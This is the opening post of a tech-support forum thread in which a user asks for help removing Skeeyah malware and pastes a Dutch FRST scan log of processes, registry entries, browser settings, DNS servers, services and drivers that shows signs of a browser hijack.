Skeeyah malware [Solved]


  • This topic is locked

#1
Tommie

  • Member
  • 39 posts

Hi guys!

It seems I am infected with the Skeeyah malware. At least that's what MS Security Essentials detected. I read on the internet that it's not easy to get rid of, so I need your help. My Chrome browser is badly affected; each hyperlink sends me to some ads. Even AdBlocker doesn't stop it. On top of that I get a regular error message that RunDLL32 has stopped working (see attachment, I couldn't add it inline).

Thanks so much for helping!

FRST:

Scanresultaten van Farbar Recovery Scan Tool (FRST) (x64) Versie:27-01-2016
Gestart door Thomas (Beheerder) op THOMASHP (31-01-2016 15:53:22)
Gestart vanaf C:\Users\Thomas\Desktop
Geladen Profielen: Thomas (Beschikbare Profielen: Thomas & Farah)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Taal: Nederlands (Nederland)
Internet Explorer Versie 11 (Standaardbrowser: Chrome)
Boot Modus: Normal
Handleiding voor Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processen (gefilterd) =================

(Als een item is opgenomen in de fixlist, het proces zal worden gesloten. Het bestand zal niet worden verplaatst.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_70dacb64382a61a7\stacsv64.exe
(Hewlett-Packard) C:\Windows\System32\hpservice.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Andrea Electronics Corporation) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_70dacb64382a61a7\AESTSr64.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Borland Software Corporation) C:\Program Files (x86)\Borland\InterBase\bin\ibguard.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
() C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Borland Software Corporation) C:\Program Files (x86)\Borland\InterBase\bin\ibserver.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Hewlett-Packard) C:\Program Files (x86)\Hp\Digital Imaging\bin\HpqSRmon.exe
(Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Enigma Software Group USA, LLC.) C:\Users\Thomas\AppData\Local\Temp\esg_uninstall.exe~
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
(Microsoft Corporation) C:\Windows\splwow64.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\msconfig.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe


==================== Register (gefilterd) ===========================

(Als een item is opgenomen in de fixlist, het registry item zal worden teruggezet naar de standaardwaarden of verwijderd. Het bestand zal niet worden verplaatst.)

HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1332296 2015-01-30] (Microsoft Corporation)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [487424 2010-03-23] (IDT, Inc.)
HKLM-x32\...\Run: [hpqSRMon] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqSRMon.exe [150528 2008-07-22] (Hewlett-Packard)
HKLM-x32\...\Run: [Magic Desktop for HP notification] => C:\ProgramData\Easybits Magic Desktop for HP\mdhpSUN.exe [1444880 2015-12-19] (Easybits)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [24952376 2015-12-22] (Dropbox, Inc.)
HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\Policies\Explorer: [NoDriveTypeAutoRun] 0x91000000
HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\MountPoints2: I - I:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\MountPoints2: {2b8d0e3f-bd57-11e2-ab5a-0027139cb244} - I:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\MountPoints2: {3ae780a1-cc27-11e0-a7cd-806e6f6e6963} - H:\Autorun.exe
HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\MountPoints2: {4b2c0f65-a7fc-11df-8008-c80aa93d6b46} - H:\pushinst.exe
HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\MountPoints2: {8e3ba2a0-b16c-11e0-9213-0027139cb244} - "K:\WD SmartWare.exe" autoplay=true
SSODL: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\system32\CbFsMntNtf3.dll (EldoS Corporation)
SSODL-x32: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\SysWOW64\CbFsMntNtf3.dll (EldoS Corporation)
ShellIconOverlayIdentifiers: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [0WualaOverlayIcon1] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG)
ShellIconOverlayIdentifiers: [0WualaOverlayIcon2] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG)
ShellIconOverlayIdentifiers: [0WualaOverlayIcon3] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG)
ShellIconOverlayIdentifiers: [0WualaOverlayIcon4] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG)
ShellIconOverlayIdentifiers: [1EldosIconOverlay] -> {904FB7E2-AD8B-45AF-B3A2-D309F7514790} => C:\Windows\System32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
ShellIconOverlayIdentifiers: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\system32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
ShellIconOverlayIdentifiers-x32: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [1EldosIconOverlay] -> {904FB7E2-AD8B-45AF-B3A2-D309F7514790} => C:\Windows\SysWow64\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
ShellIconOverlayIdentifiers-x32: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\SysWOW64\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
CHR HKLM\SOFTWARE\Policies\Google: Restrictie <======= AANDACHT

==================== Internet (gefilterd) ====================

(Als een item is opgenomen in de fixlist, als het een registry item is wordt verwijderd of hersteld naar de standaard.)

Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\Parameters: [NameServer] 82.163.142.3 95.211.158.130
Tcpip\..\Interfaces\{4CE7C2CE-6870-4554-B040-95B53DC877D2}: [DhcpNameServer] 62.179.104.196 213.46.228.196
Tcpip\..\Interfaces\{87A2D826-64D9-404E-81A5-1EF1506A015E}: [DhcpNameServer] 192.168.44.1
Tcpip\..\Interfaces\{B12B7109-6CCC-4B7F-B62A-9DCD9AB7A826}: [NameServer] 82.163.142.3 95.211.158.130
Tcpip\..\Interfaces\{B12B7109-6CCC-4B7F-B62A-9DCD9AB7A826}: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{BDFA63EE-A48F-4A09-AAA4-100407F87C51}: [DhcpNameServer] 62.179.104.196 213.46.228.196

Internet Explorer:
==================
HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://search.searchcompletion.com/?si=16615&home=true
HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.uk.msn.com/HPCON/8
SearchScopes: HKLM -> DefaultScope {97E4E265-3974-49CA-BCB6-B6CFEAA7BDE0} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {97E4E265-3974-49CA-BCB6-B6CFEAA7BDE0} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> DefaultScope {97E4E265-3974-49CA-BCB6-B6CFEAA7BDE0} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {97E4E265-3974-49CA-BCB6-B6CFEAA7BDE0} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000 -> DefaultScope {C40A74EF-1690-4E7D-BA23-2D2A8D06B733} URL = hxxp://www.google.co.uk/search?hl=en&q={searchTerms}&meta=
SearchScopes: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000 -> {3BD44F0E-0596-4008-AEE0-45D47E3A8F0E} URL = hxxp://search.searchcompletion.com/?si=16615&chrome=true&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000 -> {97E4E265-3974-49CA-BCB6-B6CFEAA7BDE0} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000 -> {C40A74EF-1690-4E7D-BA23-2D2A8D06B733} URL = hxxp://www.google.co.uk/search?hl=en&q={searchTerms}&meta=
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO: Geen Naam -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> Geen bestand
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll [2010-09-22] (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2014-06-07] (Oracle Corporation)
BHO-x32: Aanmeldhulp voor Microsoft-account -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2014-06-07] (Oracle Corporation)
Toolbar: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000 -> Geen Naam - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  Geen bestand
DPF: HKLM-x32 {C345E174-3E87-4F41-A01C-B066A90A49B4} hxxp://trial.trymicrosoftoffice.com/trialoaa/buymsoffice_assets/framework/microsoft/wrc32.ocx
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2014-05-02] (Skype Technologies)

FireFox:
========
FF ProfilePath: C:\Users\Thomas\AppData\Roaming\Mozilla\Firefox\Profiles\wvk3h4r8.default
FF Homepage: hxxps://alliances.commandandconquer.com/login/auth?utm_medium=referral&utm_source=www.google.nl&utm_campaign=cca_g-s-holland-cca
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_17_0_0_134.dll [2015-03-22] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [Geen bestand]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_17_0_0_134.dll [2015-03-22] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll [2009-07-21] (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-02-18] ()
FF Plugin-x32: @java.com/DTPlugin,version=10.60.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-06-07] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.60.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2014-06-07] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Geen bestand]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-09-12] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-09-12] (Microsoft Corporation)
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [Geen bestand]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-19] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-19] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-23] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-23] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-23] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2014-05-08] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1460008453-1702061876-2463211388-1000: @Skype Limited.com/Facebook Video Calling Plugin -> C:\Users\Thomas\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll [2014-07-24] (Skype Limited)
FF Plugin HKU\S-1-5-21-1460008453-1702061876-2463211388-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Thomas\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2013-01-10] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-1460008453-1702061876-2463211388-1000: LWAPlugin15.8 -> C:\Users\Thomas\AppData\Roaming\Mozilla\Plugins\npLWAPlugin15.8.dll [2013-03-13] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2014-05-08] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll [2014-11-15] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll [2014-11-15] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll [2014-11-15] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll [2014-11-15] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll [2014-11-15] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Thomas\AppData\Roaming\mozilla\plugins\np-mswmp.dll [2009-09-25] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Users\Thomas\AppData\Roaming\mozilla\plugins\npLWAPlugin15.8.dll [2013-03-13] (Microsoft Corporation)
FF Extension: Logitech Device Detection - C:\Users\Thomas\AppData\Roaming\Mozilla\Firefox\Profiles\wvk3h4r8.default\extensions\[email protected] [2011-08-20] [ niet getekend]
FF Extension: Adblock Plus - C:\Users\Thomas\AppData\Roaming\Mozilla\Firefox\Profiles\wvk3h4r8.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-01-31]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com
CHR Profile: C:\Users\Thomas\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Presentaties) - C:\Users\Thomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-10]
CHR Extension: (Google Documenten) - C:\Users\Thomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-10]
CHR Extension: (Google Drive) - C:\Users\Thomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-30]
CHR Extension: (YouTube) - C:\Users\Thomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-12-30]
CHR Extension: (Adblock Plus) - C:\Users\Thomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-01-30]
CHR Extension: (Google Search) - C:\Users\Thomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-30]
CHR Extension: (PanicButton) - C:\Users\Thomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\faminaibgiklngmfpfbhmokfmnglamcm [2012-07-11]
CHR Extension: (Google Spreadsheets) - C:\Users\Thomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-10]
CHR Extension: (Offline Documenten) - C:\Users\Thomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-12-30]
CHR Extension: (Betalingen via Chrome Web Store) - C:\Users\Thomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-12-30]
CHR Extension: (Gmail) - C:\Users\Thomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-01]

==================== Services (gefilterd) ========================

(Als een item is opgenomen in de fixlist, wordt uit het register verwijderd. Het bestand zal niet worden verplaatst tenzij apart vermeld.)

R2 AESTFilters; C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_70dacb64382a61a7\AESTSr64.exe [89600 2009-03-03] (Andrea Electronics Corporation)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-01-30] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-01-30] (Dropbox, Inc.)
S2 ezSharedSvc; C:\Windows\SysWOW64\ezsvc7.dll [129584 2009-02-22] (EasyBits Sofware AS) [Bestand niet getekend]
R2 fa6789c5; c:\Program Files (x86)\VideoCnv\Zet.dll [3752448 2014-10-30] () [Bestand niet getekend]
S3 hpqcxs08; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcxs08.dll [249344 2009-09-20] (Hewlett-Packard Co.) [Bestand niet getekend]
S2 hpqddsvc; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqddsvc.dll [133120 2009-09-20] (Hewlett-Packard Co.) [Bestand niet getekend]
R2 HPSLPSVC; C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL [1037824 2009-09-20] (Hewlett-Packard Co.) [Bestand niet getekend]
R2 InterBaseGuardian; C:\Program Files (x86)\Borland\InterBase\bin\ibguard.exe [32768 2002-10-30] (Borland Software Corporation) [Bestand niet getekend]
R3 InterBaseServer; C:\Program Files (x86)\Borland\InterBase\bin\ibserver.exe [1880064 2002-10-30] (Borland Software Corporation) [Bestand niet getekend]
R2 LightScribeService; C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2009-08-20] (Hewlett-Packard Company) [Bestand niet getekend]
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23784 2015-01-30] (Microsoft Corporation)
R2 MSSQL$SQLEXPRESS; c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe [58387104 2014-07-12] (Microsoft Corporation)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2008-12-03] (Hewlett-Packard) [Bestand niet getekend]
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366512 2015-01-30] (Microsoft Corporation)
R2 PassThru Service; C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe [167424 2012-12-07] () [Bestand niet getekend]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2008-12-03] (Hewlett-Packard) [Bestand niet getekend]
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [75064 2010-08-17] ()
S4 SQLAgent$SQLEXPRESS; c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [441504 2014-07-12] (Microsoft Corporation)
R2 STacSV; C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_70dacb64382a61a7\STacSV64.exe [247808 2010-03-23] (IDT, Inc.)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

===================== Drivers (gefilterd) ==========================

(Als een item is opgenomen in de fixlist, wordt uit het register verwijderd. Het bestand zal niet worden verplaatst tenzij apart vermeld.)

S3 avmeject; C:\Windows\System32\drivers\avmeject.sys [14120 2009-03-20] (AVM Berlin)
R1 cbfs3; C:\Windows\system32\drivers\cbfs3.sys [352144 2012-04-09] (EldoS Corporation)
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [22704 2016-01-30] ()
